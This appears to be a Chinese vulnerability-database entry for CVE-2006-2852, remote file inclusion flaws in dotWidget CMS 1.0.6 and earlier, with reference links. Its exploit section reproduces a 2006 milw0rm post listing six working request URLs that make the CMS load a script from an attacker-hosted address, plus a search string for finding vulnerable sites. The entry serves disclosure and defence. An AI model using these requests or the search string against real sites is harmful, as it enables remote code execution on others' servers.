DotWidget CMS 多个远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110411 漏洞类型 代码注入
发布时间 2006-06-05 更新时间 2009-04-03
CVE编号 CVE-2006-2852 CNNVD-ID CNNVD-200606-118
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/1879
https://cxsecurity.com/issue/WLB-2006060051
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200606-118
|漏洞详情
dotWidgetCMS是基于Web的内容管理系统。dotWidgetCMS实现上存在多个远程文件包含漏洞,远程攻击者可以利用文件包含漏洞执行任意命令。
|漏洞EXP
Title: dotWidget CMS <= 1.0.6 - Remote File Include Vulnerability
-----------------------------------------------------------------
Vendor: dotWidget
URL: http://dotwigdet.com
-----------------------------------------------------------------

Credits:
Discovered by: 'Aesthetico'
http://www.majorsecurity.de
-----------------------------------------------------------------
Search for: "dotwidget Printer-friendly"
-----------------------------------------------------------------

Exploitation:

/index.php?file_path=http://www.yourspace.com/yourscript.php?
/feedback.php?file_path=http://www.yourspace.com/yourscript.php?
/printfriendly.php?file_path=http://www.yourspace.com/yourscript.php?

EvilCookie <dorshirl[at]zahav.net.il> submitted these extra file_path issues.

/includes/common.inc?file_path=http://www.yourspace.com/yourscript.php?
/includes/nav.inc?file_path=http://www.yourspace.com/yourscript.php?
/admin/dotwidgetc_config.php?file_path=http://www.yourspace.com/yourscript.php?

# milw0rm.com [2006-06-05]
|参考资料

来源:XF
名称:dotwidget-filepath-file-include(26918)
链接:http://xforce.iss.net/xforce/xfdb/26918
来源:BID
名称:18258
链接:http://www.securityfocus.com/bid/18258
来源:BUGTRAQ
名称:20060603[MajorSecurity#7]dotWidgetCMS<=1.0.6-RemoteFileIncludeVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/435870/100/0/threaded
来源:OSVDB
名称:25982
链接:http://www.osvdb.org/displayvuln.php?osvdb_id=25982
来源:OSVDB
名称:25983
链接:http://www.osvdb.org/25983
来源:OSVDB
名称:25981
链接:http://www.osvdb.org/25981
来源:MISC
链接:http://www.majorsecurity.de/advisory/major_rls7.txt
来源:VUPEN
名称:ADV-2006-2141
链接:http://www.frsirt.com/english/advisories/2006/2141
来源:SECTRACK
名称:1016220
链接:http://securitytracker.com/id?1016220
来源:SREASON
名称:1045
链接:http://securityreason.com/securityalert/1045
来源:SECUNIA
名称:20463
链接:http://secunia.com/advisories/20463